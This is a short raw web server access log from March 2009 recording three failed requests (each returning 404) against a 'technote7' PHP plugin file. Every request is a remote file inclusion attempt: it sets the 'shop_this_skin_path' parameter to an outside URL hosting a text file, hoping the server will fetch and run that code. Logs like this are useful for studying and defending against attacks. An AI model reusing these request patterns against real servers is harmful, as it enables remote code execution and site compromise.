208.113.160.16 - - [22/Mar/2009:18:09:54 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.c868z.cn/FX29ID1.txt???? HTTP/1.1" 404 348 "-""Mozilla/5.0"
208.113.160.16 - - [22/Mar/2009:18:10:14 -0500] "GET /logs/access_log.1232064000//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.c868z.cn/FX29ID1.txt???? HTTP/1.1" 404 375 "-""Mozilla/5.0"
72.232.182.162 - - [22/Mar/2009:18:10:21 -0500] "GET /logs/access_log.1232064000//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.c868z.cn/FX29ID1.txt???? HTTP/1.1" 404 375 "-""Mozilla/5.0"
